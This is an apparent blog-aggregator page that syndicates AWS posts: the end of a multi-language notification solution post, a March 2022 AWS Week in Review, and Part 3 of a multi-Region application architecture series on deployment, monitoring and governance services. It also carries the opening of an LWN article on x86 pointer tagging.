The code for this solution is available on GitHub. Review the README file for detailed instructions on how to download and run the solution in your AWS account.

Conclusion

Organizations that operate on an international basis often struggle to build a multi-language notification system to communicate any business-related announcements or notifications to their customers in different languages. Communicating these announcements or notifications in a variety of formats such as email, voice, and SMS can be time-consuming. Our solution addresses these challenges using AWS services with fewer steps than traditional third-party options. This solution also features automatic scaling, built-in high availability, and a pay-for-use billing model to increase agility and optimize costs. These technologies not only decrease infrastructure management tasks like capacity provisioning and patching, but provides for a better customer experience.

Further reading:

AWS Week in Review – March 28, 2022

Post Syndicated from Marcia Villalba original https://aws.amazon.com/blogs/aws/aws-week-in-review-march-28-2022/

This post is part of our Week in Review series. Check back each week for a quick round up of interesting news and announcements from AWS!

Welcome to another round up of the most significant AWS launches from the previous week. Among the most relevant news, we have improvements done in AWS Lambda, a new service for game developers, and we are back with the AWS Summits all around the world.

Last Week’s Launches
Here are some launches that got my attention during the previous week.

AWS Lambda Now Supports Up to 10 GB Ephemeral Storage – This new launch allows you to configure the temporary file system capacity (/tmp) of Lambda up to 10 GB! This is very useful for customers that are trying to use Lambda for ETL jobs, ML inference or other data-intensive workloads. Check Channy’s launch blog post to learn more about how to get started.

Amazon GameSparks – Last week we announced the launch of Amazon GameSparks in preview. Amazon GameSparks is a new serverless service that makes it easy for developers to create, test, and tune custom game features without thinking about the underlying servers or infrastructure. It comes with out-of-the-box features ideal for game backends and it is pre-integrated with the Unity game engine. Learn more in Tabitha’s blog post.

Amazon Connect Forecasting, Capacity Planning, and Scheduling – This set of ML-powered capabilities makes it easier for contact center managers to predict customer service workloads, determine ideal staffing levels, and schedule agents accordingly. These features are available in preview and you can learn more in Sajith’s blog post.

AWS Proton Support for Terraform Open Source Last November we announced the preview for this feature, and now it is generally available in all the AWS Regions where Proton is available. Platform teams can now define Proton templates using Terraform modules. Read the What’s New post for more information.

Amazon Polly Now Offers Neural TTS Voices in Catalan and Mexican Spanish Polly is a service that turns your text into lifelike speech. It has support for Neural TTS voices in many languages, and last week they added two more, in Mexican Spanish and in Catalan. You can read more in the What’s New post and listen to the Mexican voice in this audio.


For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS News

Podcast Charlas Técnicas de AWS – If you understand Spanish, this podcast is for you. Podcast Charlas Técnicas is one of the official AWS podcasts in Spanish. It has episodes every other week. The podcast is meant for builders, and it shares stories on how customers implemented and learned AWS and how to architect applications using AWS services. You can listen to all the episodes directly from your favorite podcast app or the podcast web page.

AWS Open Source News and Updates Ricardo Sueiras, my colleague from the AWS Developer Relation team, runs this newsletter. It brings you all the latest open-source projects, posts and more. This week he shares the latest open source project, tools and also AWS and community blog posts related to open-source. Read edition #106 here.

Upcoming AWS Events
Check your calendars and sign up for these AWS events:

Building a Tech-Enabled Biotech with Celsius Therapeutics on Tuesday March 29 at 10 PM UTC – My colleague Mark Birch hosts regular Clubhouse events, in which he talks with different startups. These companies share their journey and experience using AWS. Join the live event here.

The AWS Summits Are Back – Don’t forget to register for the AWS Summits in Brussels (on March 31), Paris (on April 12), San Francisco (on April 20-21), and London (on April 27). More summits are coming in the next weeks, and we’ll let you know in these weekly posts.

That’s all for this week. Check back next Monday for another Week in Review!

— Marcia

Creating a Multi-Region Application with AWS Services – Part 3, Application Management and Monitoring

Post Syndicated from Joe Chapman original https://aws.amazon.com/blogs/architecture/creating-a-multi-region-application-with-aws-services-part-3-application-management-and-monitoring/

In Part 1 of this series, we built a foundation for your multi-Region application using AWS compute, networking, and security services. In Part 2, we integrated AWS data and replication services to move and sync data between AWS Regions.

In Part 3, we cover AWS services and features used for messaging, deployment, monitoring, and management.

Developer tools

Automation that uses infrastructure as code (IaC) removes manual steps to create and configure infrastructure. It offers a repeatable template that can deploy consistent environments in different Regions.

IaC with AWS CloudFormation StackSets uses a single template to create, update, and delete stacks across multiple accounts and Regions in a single operation. When writing an AWS CloudFormation template, you can change the deployment behavior by pairing parameters with conditional logic. For example, you can set a “standby” parameter that, when “true,” limits the number of Amazon Elastic Compute Cloud (Amazon EC2) instances in an Amazon EC2 Auto Scaling group deployed to a standby Region.

Applications with deployments that span multiple Regions can use cross-Region actions in AWS CodePipeline for a consistent release pipeline. This way you won’t need to set up different actions in each Region. EC2 Image Builder and Amazon Elastic Container Registry (Amazon ECR) have cross-Region copy features to help with consistent AMI and image deployments, as covered in Part 1.

Event-driven architecture

Decoupled, event-driven applications produce a more extensible and maintainable architecture by having each component perform its specific task independently.

Amazon EventBridge, a serverless event bus, can send events between AWS resources. By utilizing cross-Region event routing, you can share events between workloads in different Regions (Figure 1) and accounts. For example, you can share health and utilization events across Regions to determine which Regional workload deployment is best suited for requests.

EventBridge routing events from one Region to event buses in other Regions

Figure 1. EventBridge routing events from one Region to event buses in other Regions

If your event-driven application relies on pub/sub messaging, Amazon Simple Notification Service (Amazon SNS) can fan out to multiple destinations. When the destination targets are Amazon Simple Queue Service (Amazon SQS) queues or AWS Lambda functions, Amazon SNS can notify recipients in different Regions. For example, you can send messages to a central SQS queue that processes orders for a multi-Region application.

Monitoring and observability

Observability becomes even more important as the number of resources and deployment locations increases. Being able to quickly identify the impact and root cause of an issue will influence recovery activities, and ensuring your observability stack is resilient to failures will help you make these decisions. When building on AWS, you can pair the health of AWS services with your application metrics to obtain a more complete view of the health of your infrastructure.

AWS Health dashboards and APIs show account-specific events and scheduled activities that may affect your resources. These events cover all Regions, and can expand to include all accounts in your AWS Organization. EventBridge can monitor events from AWS Health to take immediate actions based on an event. For example, if multiple services are reporting as degraded, you could set the EventBridge event target to an AWS Systems Manager automated runbook that prepares your disaster recovery (DR) application for failover.

AWS Trusted Advisor offers actionable alerts to optimize cost, increase performance, and improve security and fault tolerance. Trusted Advisor shows results across all Regions and can generate a report that shows an aggregated view of all check results across all accounts within an organization.

To maintain visibility over an application deployed across multiple Regions and accounts, you can create a Trusted Advisor dashboard and an operations dashboard with AWS Systems Manager Explorer. The operations dashboard offers a unified view of resources, such as Amazon EC2, Amazon CloudWatch, and AWS Config data. You can combine the metadata with Amazon Athena to create a multi-Region and multi-account inventory view of resources.

You can view metrics from applications and resources deployed across multiple Regions in the CloudWatch console. This makes it easy to create graphs and dashboards for multi-Region applications. Cross-account functionality is also available in CloudWatch, so you can create a centralized view of dashboards, alarms, and metrics across your organization.

Amazon OpenSearch Service aggregates unstructured and semi-structured log files, messages, metrics, documents, configuration data, and more. Cross-cluster replication replicates indices, mappings, and metadata in an active-passive setup from one OpenSearch Service domain to another. This reduces latency across Regions and ensures high availability of your data.

AWS Resilience Hub assesses and tracks the resiliency of your application. It checks how well an application will maintain availability when performing a Regional failover. For example, it can check if an application has cross-Region replication configured on Amazon Simple Storage Service (Amazon S3) buckets or that Amazon Relational Database Service (Amazon RDS) instances have a cross-Region read-replica. Figure 2 shows an output of a Resilience Hub assessment. It recommends use of Route 53 Application Recovery Controller (covered in Part 1) to ensure the Amazon EC2 Auto Scaling group in a Region is scaled and ready to accept traffic before we fail over to it.

Resilience Hub recommendations

Figure 2. Resilience Hub recommendations

Management: Governance

Growing an application into a new country means there may be additional data privacy laws and regulations to follow. These will vary depending on the country, and we encourage you to investigate with your legal team to fully understand how this affects your application.

AWS Control Tower supports data compliance by providing guardrails to control and meet data residency requirements. These guardrails are a collection of Service Control Policies (SCPs) and AWS Config rules. You can implement them independently of AWS Control Tower if needed. Additional security-centric multi-Region services are covered in part 1.

AWS Config provides a detailed view of the configuration and history of AWS resources. An AWS Config aggregator collects configuration and compliance data from multiple accounts and Regions into a central account. This centralized view offers a comprehensive view of the compliance and actions on resources, regardless of which account or Region they reside in.

Management: Operations

Several AWS Systems Manager capabilities allow for easier administration of AWS resources, especially as applications grow. Systems Manager Automation simplifies common maintenance and deployment tasks for AWS resources with automated runbooks. These runbooks automate actions on resources across Regions and accounts. You can pair Systems Manager Automation with Systems Manager Patch Manager to ensure instances maintain the latest patches across accounts and Regions. Figure 3 shows Systems Manager running several automation documents on a multi-Region architecture.

Using Systems Manager automation from a central operations AWS account to automate actions across multiple Regions

Figure 3. Using Systems Manager automation from a central operations AWS account to automate actions across multiple Regions

Bringing it together

At the end of each part of this blog series, we build on a sample application based on the services covered. This shows you how to bring these services together to build a multi-Region application with AWS services. We don’t use every service mentioned, just those that fit the use case.

We built this example to expand to a global audience. It requires high availability across Regions, and favors performance over strict consistency. We have chosen the following services covered in this post to accomplish our goals, building on our foundation from part 1 and part 2:

  • CloudFormation StackSets to deploy everything with IaC. This ensures the infrastructure is deployed consistently across Regions.
  • AWS Config rules provide a centralized place to monitor, record, and evaluate the configuration of our resources.
  • For added observability, we created dashboards with CloudWatch dashboard, Personal Health dashboard, and Trusted Advisor dashboard.
Building an application with multi-Region services

Figure 4. Building an application with multi-Region services

While our primary objective is expanding to a global audience, we note that some of the services such as CloudFormation StackSets rely on Region 1. Each Regional deployment is set up for static stability, but if there were an outage in Region 1 for an extended period of time, our DR playbook would outline how to make CloudFormation changes in Region 2.

Summary

Many AWS services have features to help you build and manage a multi-Region architecture, but identifying those capabilities across 200+ services can be overwhelming.

In this 3-part blog series, we’ve explored AWS services with features to assist you in building multi-Region applications. In Part 1, we built a foundation with AWS security, networking, and compute services. In Part 2, we added in data and replication strategies. Finally, in Part 3, we examined application and management layers.

Ready to get started? We’ve chosen some AWS Solutions, AWS Blogs, and Well-Architected labs to help you!

Other posts in this series

Related information

[$] Pointer tagging for x86 systems

Post Syndicated from original https://lwn.net/Articles/888914/

Pointers are a fact of life for developers working in numerous languages.
It is often convenient to be able to associate a small
amount — a few bits at most — of ancillary information with a pointer.
This can often be done within the pointer value itself with some careful
masking and shifting. CPU manufacturers have been adding ways to support
the addition of this sort of “tag” to pointers; the most recent may be
AMD’s “upper address ignore” (UAI) feature, support for which was
recently posted
by Bharata B Rao. This feature has an uncertain future in Linux, though,
as the result of a fundamental design decision.

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close